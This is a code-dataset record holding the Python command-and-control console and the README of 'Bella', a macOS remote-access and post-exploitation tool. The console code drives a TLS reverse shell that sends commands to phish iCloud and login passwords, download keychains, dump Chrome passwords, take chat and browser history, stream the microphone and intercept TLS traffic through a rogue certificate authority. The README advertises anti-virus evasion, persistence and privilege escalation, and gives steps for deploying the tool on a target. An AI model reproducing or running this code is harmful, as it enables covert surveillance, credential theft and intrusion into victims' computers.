"qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00xglitch/Bella | Control Center.py | #!/usr/bin/env python
# coding=utf-8
import socket, os, sys, select, time, bz2, random, platform, datetime, base64, pickle
import re, urllib, json, subprocess, errno, struct, optparse, ssl
try:
import gnureadline
macOS_rl = False
except ImportError:
import rlcompleter
import readline
macOS_rl = True
violet = '\001\033[95m\002'
blue = '\001\033[94m\002' #94 for original light blue
lightBlue = '\001\033[34m\002'
green = '\001\033[92m\002' #32 for a little darker
darkGreen = '\001\033[32m\002'
yellow = '\001\033[93m\002'
red = '\001\033[31m\002'
endC = '\001\033[0m\002'
bold = '\001\033[1m\002'
italics = '\001\033[3m\002'
underline = '\001\033[4m\002'
ps1Green = '\001\033[1;32m\022'
offGreen = '\001\033[36m\002' #light blue lol
offBlue = '\001\033[38;5;148m\002'
purple = '\001\033[0;35m\002'
redX = "%s[x] %s" % (red, endC)
greenCheck = "%s[+] %s" % (green, endC)
bluePlus = "%s[*] %s" % (blue, endC)
commands = ['iCloud_query', 'upload', 'download', 'screen_shot', 'iCloud_contacts', 'iCloud_FMF', 'chrome_dump', 'shutdown_server', 'iCloud_FMIP', 'chrome_safe_storage', 'insomnia_load', 'insomnia_unload', 'iCloud_token', 'iCloud_phish', 'mike_stream', 'reboot_server', 'safari_history', 'check_backups','keychain_download', 'mitm_start', 'mitm_kill', 'chat_history', 'get_root', 'bella_info', 'current_users', 'sysinfo', 'user_pass_phish']
def subprocess_cleanup(subprocess_list):
if len(subprocess_list) > 0:
print '\nCleaning up subprocesses',
for x in subprocess_list:
os.kill(x, 9)
return 0
def row_set():
return int(subprocess.check_output("stty size", shell=True).split()[1])
def clear(*null):
return os.system("clear")
def string_log(logged, client_log_path, client_name):
if not os.path.isfile(os.path.join(client_log_path, client_name + ".txt")):
#print "Logs deleted, starting new log file."
try:
os.makedirs(client_log_path) #create directory if it does not exist
#print "Rebuilt user log path"
except OSError as e:
if e[0] == 17:
pass
pass
open(os.path.join(client_log_path, client_name + ".txt"), 'w').close() #create file if it does not exist
with open(os.path.join(client_log_path, client_name + ".txt"), "ab") as content:
if len(logged) > 0:
if logged[-1] == '\n':
content.write(logged)#fixes double printing of new line
else:
content.write(logged + '\n')
else:
content.write(logged)
def byte_convert(byte):
for count in ['B','K','M','G']:
if byte < 1024.0:
return ("%3.1f%s" % (byte, count)).replace('.0', '')
byte /= 1024.0
return "%3.1f%s" % (byte, 'TB')
def downloader(fileContent, file_name, client_log_path, client_name, path=''):
if path:
if not os.path.isdir(client_log_path + path):
os.makedirs(os.path.join(client_log_path + path))
with open(os.path.join(client_log_path, path, file_name), 'w') as content:
content.write(fileContent)
downloaded = "%s%s [%sB] successfully downloaded to [%s]" % (bluePlus, file_name, byte_convert((os.path.getsize(os.path.join(client_log_path, path, file_name)))), os.path.join("/".join(client_log_path.rsplit("/", 3)[1:3]), path))
print downloaded
string_log(downloaded, client_log_path, client_name)
def encode(key, clear):
enc = []
for i in range(len(clear)):
key_c = key[i % len(key)]
enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)
enc.append(enc_c)
return base64.urlsafe_b64encode("".join(enc))
def decode(key, enc):
dec = []
enc = base64.urlsafe_b64decode(enc)
for i in range(len(enc)):
key_c = key[i % len(key)]
dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)
dec.append(dec_c)
return "".join(dec)
def send_msg(sock, msg):
msg = pickle.dumps(msg)
finalMsg = struct.pack('>I', len(msg)) + msg
sock.sendall(finalMsg)
def recv_msg(sock):
raw_msglen = recvall(sock, 4, True)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
return recvall(sock, msglen, False)
def recvall(sock, n, length):
if length:
return sock.recv(4)
data = ''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return pickle.loads(data) #convert the data back to normal
def tab_parser(text, exist):
global file_list
for File in file_list:
if File.startswith(text):
if not exist:
return File
else:
exist -= 1
def progressbar(width, prefix, size):
count = len(width)
def show(_i):
x = int(size*_i/count)
string3 = "%s[%s%s] \r" % (prefix, "#"*x, "."*(size-x))
sys.stdout.write(string3)
sys.stdout.flush()
show(0)
for i, item in enumerate(width):
yield item
show(i+1)
sys.stdout.write("\n")
sys.stdout.flush()
def main():
serverisRoot = False
ctrlC = False
active=False
first_run = True
logpath = 'Logs/'
helperpath = ''
client_log_path = ''
client_name = ''
clients = []
connections = []
subprocess_list = []
global file_list
file_list = commands
computername = ''
activate = 0
columns = row_set()
if not os.path.isfile("%sserver.key" % helperpath):
print '\033[91mGENERATING CERTIFICATES TO ENCRYPT THE SOCKET.\033[0m\n\n'
os.system('openssl req -x509 -nodes -days 365 -subj "/C=US/ST=Bella/L=Bella/O=Bella/CN=bella" -newkey rsa:2048 -keyout %sserver.key -out %sserver.crt' % (helperpath, helperpath))
clear()
port = 4545
print '%s%s%s%s' % (purple, bold, 'Listening for clients over port [%s]'.center(columns, ' ') % port, endC)
sys.stdout.write(blue + bold)
for i in progressbar(range(48), '\t ', columns - 28):
time.sleep(0.05)
sys.stdout.write(endC)
colors = [blue, green, yellow]
random.shuffle(colors)
binder = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
binder.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
binder.bind(('', port))
binder.listen(128) #max number of connections macOS can handle
while True:
columns = row_set()
try:
#c.settimeout(4)
try:
#wrap before we accept
#to generate certs: openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout server.key -out server.crt
sock, accept = ssl.wrap_socket(binder, ssl_version=ssl.PROTOCOL_TLSv1, cert_reqs=ssl.CERT_NONE, server_side=True, keyfile='%sserver.key' % helperpath, certfile='%sserver.crt' % helperpath).accept()
except socket.timeout:
continue
except IOError as e:
if e.errno == 2:
print 'You must generate SSL certificates to encrypt the socket.'
os.remove('%sserver.key' % helperpath) #openssl will create this empty, so remove junk
exit()
if(accept):
sock.settimeout(None)
connections +=[sock]
clients += [accept]
clear() #see how many more we can accept, clear
print "%s%s%s%s\n" % (purple, bold, 'Found clients!'.center(columns, ' '), endC)
if len(clients)>0:
dater=[]
colorIndex = 0
for j in range(0,len(clients)):
if colorIndex == len(colors):
colorIndex = 0
try:
send_msg(connections[j], 'get_client_info') #we do this because this section of this program doesnt understand the EOF construct / tuple serialization
message = recv_msg(connections[j])
dater.append(message)
except socket.error as e:
connections = []
clients = []
break
print '%s%s%s%s' % (colors[colorIndex], bold, ('[%s] %s, %s' % ((j+1), dater[j][0], clients[j][0])).center(columns, ' '), endC)
colorIndex += 1
print yellow + ("_"*(columns-30)).center(columns, ' ') + endC
except KeyboardInterrupt:
clear()
if len(clients)>0:
print "%s%s%s%s\n" % (purple, bold, 'Enter ID to initiate connection:'.center(columns, ' '), endC)
colorIndex = 0
for j in range(0,len(clients)):
if colorIndex == len(colors):
colorIndex = 0
print '%s%s%s%s' % (colors[colorIndex], bold, ('[%s] %s, %s' % ((j+1), dater[j][0], clients[j][0])).center(columns, ' '), endC)
colorIndex += 1
print yellow + ("_"*(columns-30)).center(columns, ' ') + endC
while True:
try:
activate = input()
try:
clients[activate - 1][0]
except IndexError:
print "Client [%s] does not exist. Try again." % activate
continue
break
except SyntaxError, e:
print "Enter a client number."
continue
clear()
if activate==0:
subprocess_cleanup(subprocess_list)
print 'Exiting...'
exit()
activate -=1 #so array doesnt get thrown off
ipadrr = clients[activate][0]
active=True
for i, x in enumerate(clients):
if i != activate:
#print 'Rejecting Connection from [%s, %s]' % clients[i]
connections[i].close()
print '%sAccepting%s Connection from [%s%s%s] at [%s%s%s]' % (yellow, endC, yellow, dater[i][0].split("->")[0], endC, yellow, clients[i][0], endC)
send_msg(connections[activate], 'initializeSocket')
first_run = True
now = datetime.datetime.now()
while active:
try:
columns = row_set()
if ctrlC:
if process_running:
send_msg(connections[activate], 'sigint9kill') #this will kill their blocking program, reset our data
while 1:
x = recv_msg(connections[activate])
if x:
if x[0] == 'terminated':
break
continue
data = "\n"
ctrlC = False
else:
(data, isFinished) = recv_msg(connections[activate])
if not isFinished:
print data, #print it and continue
continue #just go back to top and keep receiving
nextcmd = ''
process_running = False
if type(data) == type(None):
active=False
print "\n%s%sLost connection to server.%s" % (red, bold, endC)
if first_run == True:
is_server_rooted = False
if data == 'payload_request_SBJ129':
print 'Payloads requested. Sending payloads...'
with open('Payloads/payloads.txt', 'rb') as content:
payloads = content.read()
nextcmd = 'payload_response_SBJ29:::%s' % payloads
workingdir, client_name, computername, client_log_path = ('',) * 4
elif not data.splitlines()[0].startswith("bareNeccesities"):
basicInfo = data.splitlines()
if basicInfo[0] == 'ROOTED':
is_server_rooted = True
basicInfo.remove('ROOTED')
computername = basicInfo[0] #hostname via scutil
client_name = basicInfo[1] #username via whoami
workingdir = basicInfo[2] #cwd via pwd
last_login = basicInfo[3] #last login read via DB
uptime = basicInfo[4] #bella uptime
client_log_path = "%s%s/%s/" % (logpath, computername, client_name)
if not os.path.exists(client_log_path):
os.makedirs(client_log_path)
first_run = False
print 'Last Connected: %s -- %s' % (last_login, uptime)
else:
computername = data.splitlines()[1] #hostname via scutil
client_name = data.splitlines()[2] #username via whoami
workingdir = data.splitlines()[3] #cwd via pwd
client_log_path = "%s%s/%s/" % (logpath, computername, client_name)
if not os.path.exists(client_log_path):
os.makedirs(client_log_path)
first_run = False
elif data.startswith('cwdcwd')==True:
sdoof = data.splitlines()
workingdir = sdoof[0][6:]
file_list = map(str.lower, sdoof[1:]) + sdoof[1:] + commands
string_log(workingdir + '\n', client_log_path, client_name)
elif data.startswith('downloader')==True:
(fileContent, file_name) = pickle.loads(data[10:])
downloader(fileContent, file_name, client_log_path, client_name)
elif data.startswith("mitmReady")==True:
os.system("osascript >/dev/null <<EOF\n\
tell application \"Terminal\"\n\
do script \"mitmproxy -p 8081 --cadir %s\"\n\
end tell\n\
EOF" % helperpath)
print 'MITM-ing. RUN mitm_kill AFTER YOU CLOSE MITMPROXY OR THE CLIENT\'S INTERNET WILL NOT WORK.'
elif data.startswith('keychain_download')==True:
keychains = pickle.loads(data[17:])
for x in keychains:
(keychainName, keychainData) = pickle.loads(x) #[keychainName, keychainData]
downloader(keychainData, keychainName, client_log_path, client_name, 'Keychains')
elif data.startswith('appleIDPhishHelp') == True:
content = pickle.loads(data[16:])
if len(content[0]) > 0:
print "%sFound the following iCloud accounts.\n%s\nWhich would you like to use to phish current GUI user [%s]?" % (bluePlus, content[0], content[1])
appleID = content[0].split(' Apple ID: [')[1][:-2]
else:
print "%sCouldn't find any iCloud accounts.\nEnter one manually to phish current GUI user [%s]" % (bluePlus, content[1])
appleID = ''
username = raw_input("Enter iCloud Account: ") or appleID
if username == '':
print 'No username specified, cancelling Phish'
nextcmd = ''
else:
print "Phishing [%s%s%s]" % (blue, username, endC)
nextcmd = "iCloudPhishFinal%s:%s" % (username, content[1])
elif data.startswith('screenCapture')==True:
screen = data[13:]
if screen == "error":
print "%sError capturing screenshot!" % redX
else:
fancyTime = time.strftime("_%m-%d_%H_%M_%S")
os.system("mkdir -p %sScreenshots" % client_log_path)
with open("%sScreenshots/screenShot%s.png" % (client_log_path, fancyTime), "w") as shot:
shot.write(base64.b64decode(screen))
time.sleep(1)
os.system("open %sScreenshots/screenShot%s.png" % (client_log_path, fancyTime)) #We cannot have this here. Lets victim run code on our comp if they want.
elif data.startswith('C5EBDE1F')==True:
deserialize = pickle.loads(data[8:])
for x in deserialize:
(name, data) = x #name will be the user, which we're going to want on the path
downloader(bz2.decompress(data), 'ChatHistory_%s.db' % time.strftime("%m-%d_%H_%M_%S"), client_log_path, client_name, 'Chat/%s' % name)
print "%sGot macOS Chat History" % greenCheck
elif data.startswith('6E87CF0B')==True:
deserialize = pickle.loads(data[8:])
for x in deserialize:
(name, data) = x #name will be the user, which we're going to want on the path
downloader(bz2.decompress(data), 'history_%s.txt' % time.strftime("%m-%d_%H_%M_%S"), client_log_path, client_name, 'Safari/%s' % name)
print "%sGot Safari History" % greenCheck
elif data.startswith('lserlser')==True:
(rawfile_list, filePrint) = pickle.loads(data[8:])
widths = [max(map(len, col)) for col in zip(*filePrint)]
for fileItem in filePrint:
line = " ".join((val.ljust(width) for val, width in zip(fileItem, widths))) #does pretty print
print line
string_log(line, client_log_path, client_name)
else:
if len(data) == 0:
sys.stdout.write('')
else:
print data,
string_log(data, client_log_path, client_name)
"""Anything above this comment is what the server is sending us."""
#################################################################
"""Anything below this comment is what we are sending the server."""
if data.startswith('Exit')==True:
active=False
subprocess_cleanup(subprocess_list)
print "\n%s%sGoodbye.%s" % (blue, bold, endC)
exit()
else:
if is_server_rooted:
client_name_formatted = "%s%s@%s%s" % (red, client_name, computername, endC)
else:
client_name_formatted = "%s%s@%s%s" % (green, client_name, computername, endC)
if workingdir.startswith("/Users/" + client_name.lower()) or workingdir.startswith("/Users/" + client_name):
pathlen = 7 + len(client_name) #where 7 is our length of /Users/
workingdir = "~" + workingdir[pathlen:] #change working dir to ~[/users/name:restofpath] (in that range)
workingdirFormatted = blue + workingdir + endC
if macOS_rl:
readline.parse_and_bind("bind ^I rl_complete")
readline.set_completer(tab_parser)
else:
gnureadline.parse_and_bind("tab: complete")
gnureadline.set_completer(tab_parser)
if nextcmd == "":
try:
nextcmd = raw_input("[%s]-[%s] " % (client_name_formatted, workingdirFormatted))
string_log("[%s]-[%s] %s" % (client_name, workingdirFormatted, nextcmd), client_log_path, client_name)
except EOFError, e:
nextcmd = "exit"
else:
pass
if nextcmd == "removeserver_yes":
verify = raw_input("Are you sure you want to delete [%s]?\n🦑 This cannot be un-done. (Y/n): " % computername)
if verify.lower() == "y":
print "%s%sRemote server is being removed and permanently deleted.%s" % (red, bold, endC)
nextcmd = "removeserver_yes"
print "%s%sDestruct routine successfully sent. Server is destroyed.%s" % (red, bold, endC)
else:
print "Not deleting server."
nextcmd = ""
if nextcmd == "cls":
file_list = commands
nextcmd = ""
if nextcmd == ("mitm_start"):
try:
import mitmproxy
except ImportError:
print 'You need to install the python library "mitmproxy" to use this function.'
break
if not os.path.isfile("%smitm.crt" % helperpath):
print "%sNo local Certificate Authority found.\nThis is necessary to decrypt TLS/SSL traffic.\nFollow the steps below to generate the certificates.%s\n\n" % (red, endC)
os.system("openssl genrsa -out mitm.key 2048")
print "%s\n\nYou can put any information here. Common Name is what will show up in the Keychain, so you may want to make this a believable name (IE 'Apple Security').%s\n\n" % (red, endC)
os.system("openssl req -new -x509 -key mitm.key -out mitm.crt")
os.system("cat mitm.key mitm.crt > mitmproxy-ca.pem")
os.remove("mitm.key")
os.system("mv mitmproxy-ca.pem mitm.crt %s" % helperpath)
#mitm.crt is the cert we will install on remote client.
#mitmproxy-ca.pem is for mitmproxy
print '%sGenerated all certs. Sending over to client.%s' % (green, endC)
with open('%smitm.crt' % helperpath, 'r') as content:
cert = content.read()
print 'Found the following certificate:'
for x in subprocess.check_output("keytool -printcert -file %smitm.crt" % helperpath, shell=True).splitlines():
if 'Issuer: ' in x:
print "%s%s%s" % (lightBlue, x, endC)
interface = raw_input("🚀 Specify an interface to MITM [Press enter for Wi-Fi]: ").replace("[", "").replace("]", "") or "Wi-Fi"
nextcmd = "mitm_start:::%s:::%s" % (interface, cert)
if nextcmd == ("mitm_kill"):
for x in subprocess.check_output("keytool -printcert -file %smitm.crt" % helperpath, shell=True).splitlines():
if 'SHA1: ' in x:
certsha = ''.join(x.split(':')[1:]).replace(' ', '')
break
certsha = False
if not certsha:
print 'Could not find certificate to delete. You may see some warnings.'
interface = raw_input("🎯 Specify an interface to stop MITM [Press enter for Wi-Fi]: ").replace("[", "").replace("]", "") or "Wi-Fi"
nextcmd = "mitm_kill:::%s:::%s" % (interface, certsha)
if nextcmd == "clear":
clear()
nextcmd = "printf ''"
if nextcmd == "restart":
nextcmd = "osascript -e 'tell application \"System Events\" to restart'"
if nextcmd == "disableKM":
print "[1] Keyboard | [2] Mouse"
device = raw_input("Which device would you like to disable? ")
if device == "1":
nextcmd = "disableKMkeyboard"
elif device == "2":
nextcmd = "disableKMmouse"
else:
nextcmd = "printf 'You must specify a device [1] || [2].\n'"
if nextcmd == "enableKM":
print "[1] Keyboard | [2] Mouse"
device = raw_input("Which device would you like to enable? [BUGGY, MAY CAUSE KERNEL PANIC] ")
if device == "1":
nextcmd = "enableKMkeyboard"
elif device == "2":
nextcmd = "enableKMmouse"
else:
nextcmd = "printf 'You must specify a device [1] || [2].\n'"
if nextcmd == "shutdown":
nextcmd = "osascript -e 'tell application \"System Events\" to shut down'"
if nextcmd == "mike_stream":
try:
if not os.path.exists(client_log_path + 'Microphone'):
os.makedirs(client_log_path + 'Microphone')
subprocess.check_output("osascript >/dev/null <<EOF\n\
tell application \"Terminal\"\n\
ignoring application responses\n\
do script \"nc -l 2897 | tee '%s%s%s' 2>&1 | %s/Payloads/speakerpipe\"\n\
end ignoring\n\
end tell\n\
EOF" % (client_log_path, 'Microphone/', time.strftime("%b %d %Y %I:%M:%S %p"), os.getcwd()), shell=True) #tee the output for later storage, and also do an immediate stream
except subprocess.CalledProcessError as e:
pass #this is expected 'execution error: Can't get end'
except Exception as e:
print 'Error launching listener.\n[%s]' % e
nextcmd = ''
if nextcmd == "shutdown_server":
nextcmd = ""
if raw_input("Are you sure you want to shutdown the server?\nThis will unload all LaunchAgents: (Y/n) ").lower() == "y":
nextcmd = "shutdownserver_yes"
if nextcmd == "updateserver_yes":
if raw_input("Are you sure you want to update the server?: (Y/n) ").lower() == "y":
nextcmd = "updateserver_yes"
else:
nextcmd = ""
if nextcmd == "vnc":
vnc_port = 5500
nextcmd = "vnc_start:::%s" % vnc_port
proc = subprocess.Popen("/Applications/VNC\ Viewer.app/Contents/MacOS/vncviewer -listen %s" % vnc_port, shell=True)
subprocess_list.append(proc.pid)
if nextcmd == "volume":
vol_level = str(raw_input("Set volume to? (0[low]-7[high]) "))
nextcmd = "osascript -e \"Set Volume \"" + vol_level + ""
if nextcmd == "sysinfo":
nextcmd = 'scutil --get LocalHostName; whoami; pwd; echo "----------"; sw_vers; ioreg -l | awk \'/IOPlatformSerialNumber/ { print "SerialNumber: \t" $4;}\'; echo "----------";sysctl -n machdep.cpu.brand_string; hostinfo | grep memory; df -h / | grep dev | awk \'{ printf $3}\'; printf "/"; df -h / | grep dev | awk \'{ printf $2 }\'; echo " HDD space used"; echo "----------"; printf "Local IP: "; ipconfig getifaddr en0; ipconfig getifaddr en1; printf "Current Window: "; python -c \'from AppKit import NSWorkspace; print NSWorkspace.sharedWorkspace().frontmostApplication().localizedName()\'; echo "----------"'
if nextcmd.startswith("upload"): #uploads to CWD.
if nextcmd == "upload":
local_file= raw_input("🌈 Enter full path to file on local machine: ")
else:
local_file = nextcmd[7:] #take path as stdin
local_file = subprocess.check_output('printf %s' % local_file, shell=True) #get the un-escaped version for python recognition
if os.path.isfile(local_file):
with open(local_file, 'rb') as content:
sendFile = content.read()
file_name = content.name.split('/')[-1] #get absolute file name (not path)
file_name = raw_input("Uploading file as [%s]. Enter new name if desired: " % file_name) or file_name
nextcmd = "uploader%s" % pickle.dumps((sendFile, file_name))
else:
print "Could not find [%s]!" % local_file
nextcmd = ''
if nextcmd.startswith("download"): #uploads to CWD.
if nextcmd == "download":
remote_file = raw_input("🐸 Enter path to file on remote machine: ")
else:
remote_file = nextcmd[9:] #take path as stdin
nextcmd = 'download' + remote_file
if len(nextcmd) == 0:
nextcmd = "printf ''"
send_msg(connections[activate], nextcmd) #bring home the bacon
process_running = True
except KeyboardInterrupt:
ctrlC = True
continue
except socket.error as v:
active = False
clear()
if v[0] == 54:
subprocess_cleanup(subprocess_list)
print "%s%sBroken pipe." % (red, bold, endC)
exit()
if __name__ == '__main__':
main()
| 30,385 | Control Center | py | en | python | code | {"qsc_code_num_words": 3239, "qsc_code_num_chars": 30385.0, "qsc_code_mean_word_length": 4.58968818, "qsc_code_frac_words_unique": 0.22661315, "qsc_code_frac_chars_top_2grams": 0.00699583, "qsc_code_frac_chars_top_3grams": 0.02973227, "qsc_code_frac_chars_top_4grams": 0.01917126, "qsc_code_frac_chars_dupe_5grams": 0.23301493, "qsc_code_frac_chars_dupe_6grams": 0.17825911, "qsc_code_frac_chars_dupe_7grams": 0.16655455, "qsc_code_frac_chars_dupe_8grams": 0.16050047, "qsc_code_frac_chars_dupe_9grams": 0.13157541, "qsc_code_frac_chars_dupe_10grams": 0.10063232, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02202737, "qsc_code_frac_chars_whitespace": 0.38443311, "qsc_code_size_file_byte": 30385.0, "qsc_code_num_lines": 604.0, "qsc_code_num_chars_line_max": 638.0, "qsc_code_num_chars_line_mean": 50.30629139, "qsc_code_frac_chars_alphabet": 0.77250855, "qsc_code_frac_chars_comments": 0.05604739, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.28409091, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0094697, "qsc_code_frac_chars_string_length": 0.18890022, "qsc_code_frac_chars_long_word_length": 0.01048078, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 0.0, "qsc_codepython_frac_lines_func_ratio": null, "qsc_codepython_cate_var_zero": null, "qsc_codepython_frac_lines_pass": 0.0094697, "qsc_codepython_frac_lines_import": 0.01704545, "qsc_codepython_frac_lines_simplefunc": null, "qsc_codepython_score_lines_no_logic": null, "qsc_codepython_frac_lines_print": 0.10037879} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 1, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
00xglitch/Bella | README.md | # Bella
Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS. 🍎 💻
## What is it?
Bella is a robust, `pure python`, post-exploitation and remote administration tool for macOS.
`Bella` a.k.a. the `server` is an SSL/TLS encrypted reverse shell that can be dropped on any system running macOS >= 10.6. `Bella` offers the following features:
1. `Pseudo-TTY that emulates an SSH instance` [CTRL-C support for most functions, streaming output, full support for inline bash scripting, tab completion, command history, etc].
2. `Auto installer!` Just execute the binary, and Bella takes care of the rest - a persistent reverse shell in a hidden location on the hard drive, undetectable by anti-viruses.
3. `Upload / Download any file[s]`
4. `Reverse VNC Connection.`
5. `Stream and save the computer's microphone input.`
6. `Login / keychain password phishing through system prompt.`
7. `Apple ID password phishing through iTunes prompt.`
8. `iCloud Token Extraction.`
9. `Accessing all iCloud services of the user through extracted tokens or passwords.`
`This includes: iCloud Contacts, Find my iPhone, Find my Friends, iOS Backups.`
10. `Google Chrome Password Extraction.`
11. `Chrome and Safari History Extraction.`
12. `Auto Keychain decryption upon discovery of kc password.`
13. `macOS Chat History.`
14. `iTunes iOS Backup enumeration.`
15. `Extensive logging of all Bella activity and downloaded files.`
16. `VERY comprehensive data storage.` All information that Bella discovers [tokens, passwords, etc] is stored in an encrypted SQL database on the computer running Bella. This information is used for faster function execution, and a "smarter" reverse shell.
17. `A lot of other great features!` Mess around with it to see it in action.
These are some of the features available when we are in the userland. This shell is accessible at any time when the user has an internet connection, which occurs when they are logged in and the computer is not asleep.
If we get `root`, Bella's capabilities greatly expand.
Similar to the `getsystem` function on a meterpreter shell, Bella has a `get_root` function that will attempt to gain root access through a variety of means, including through a phished user password and/or local privilege escalation exploits if the system is vulnerable.
Upon gaining root access, Bella will migrate over to a hidden directory in /Library, and will load itself as a LaunchDaemon. This now provides remote access to the Bella instance **at all times**, as long as the computer has a network connection. Once we get root, we can do the following:
1. `MULTI-USER SUPPORT!` Bella will keep track of all information from any active users on the computer in a comprehensive database, and will automatically switch to the active computer user. All of the aforementioned data extraction techniques are now available for every user on the machine.
2. `Decrypt ALL TLS/SSL traffic and redirect it through the control center!` [a nice, active, MITM attack]
3. `Disable/Enable the Keyboard and/or Mouse.`
4. `Load an Insomnia KEXT to keep a connection open if the user closes their laptop.`
5. `Automatic dumping of iCloud Tokens and Chrome passwords` [leverages keychaindump and chainbreaker if SIP is disabled]
5. `A lot of behind the scenes automation.`
## HOW TO USE
**Bella**'s `power` lies in its high level of automation of most of the painstaking tasks that one faces in a post-exploitation scenario. It is incredibly easy to **setup and use**, requires no pre-configuration on the target, and very little configuration on the Control Center. It leverages the *incredible* behind the scenes power of macOS and Python for a fluid post-exploitation experience.
1. Download / clone this repository.
2. Run ./BUILDER and enter the appropriate information.
3. That's it! Bella is all ready to go. Just upload and execute `Bella` on your macOS target.
4. Now run `Control Center.py` on your macOS control center. It requires no-dependencies [except for mitmproxy if you want to MITM]. It will do some auto-configuration, and you will see something like this after a few seconds.
The Control Center will constantly update this selection, for up to 128 separate computers.
5. Press `Ctrl-C` to choose from the selection, and then type in the number of the computer that you want. You will then be presented with a screen like this.
6. Start running commands! `bella_info` is a great one. Run `manual` to get a full manual of all of the commands. Also, you can hit tab twice to see a list of available commands.
**Little note**: Bella works across the internet, if you do some configuration. Configure your firewall to forward Bella's port to your Control Center. Other important ports to forward:
1) VNC - 5500. 2) Microphone - 2897. 3) MITM - 8081
## Other Information
This project is being **actively** maintained. Please submit any and all bug reports, questions, feature requests, or related information.
Bella leverages keychaindump, VNC, microphone streaming, etc, by sending base64 encoded C binaries over to the Bella server / target. I have included pre-compiled and encoded files in the Payloads/payloads.txt file. If you wish to compile your own version of these payloads, here is what to do after you compile them:
1. Encode them in base64 and put them in the payloads.txt in the following order, each one separated by a new line.
2. vnc, keychaindump, microphone, rootshell, insomnia, lock_icon, chainbreaker.
payload_generator in the Payloads directory should help with this.
Please let me know if you have any issues.
### HUGE thanks
`https://github.com/juuso/keychaindump`
`https://github.com/n0fate/chainbreaker`
`https://github.com/richardkiss/speakerpipe-osx`
`https://github.com/semaja2/InsomniaX`
`https://github.com/stweil/OSXvnc`
### TODO
1. `Control Center support for Linux` [shouldn't take too much tweaking]
1. `Reverse SOCKS proxy to tunnel our traffic through the server.`
2. `Firefox password decryption / extraction`
3. `Keystroke logging with legible output [80% done]`
4. `Detect ALL programs that cause a block, and kill them [85% done]`
5. The `interactive_shell` command, that provides a fully interactive tty through the `ptty`module. The only downside to this feature at the moment is that is cannot run the pre-programmed functions. [95% done, just working on integration for pre-programmed functions]
#### Some design points
1. As previously stated, Bella is a pseudo-TTY. By this, the base socket and remote code execution handling of Bella is a fairly abstracted version of a very simple request-response socket. Bella receives a command from the server. If the command matches a pre-programmed function (i.e chrome history dump), then it will perform that function, and send the response back to the client. The client will then handle the response in the same way. After processing the response, it will prompt the client for another command to send.
2. Issues with a low-level socket are numerous, and not limited to:
3. Program execution that blocks and hangs the pipe, waiting for output that never comes (sudo, nano, ftp)
4. Not knowing how much data to expect in the socket.recv() call.
5. Not being able to send ctrl-C, ctrl-Z and similar commands.
6. No command history
7. A program that crashes can kill a shell.
8. One-to-one response and request.
3. Bella address the above by:
4. recv() and send() functions that serialize the length of the message, and loop through response/requests accordingly.
5. Readline integration to give a more 'tty' like feel, including ctrl-C support, command history, and tab completion.
6. Detecting programs that block, and killing them **beta**
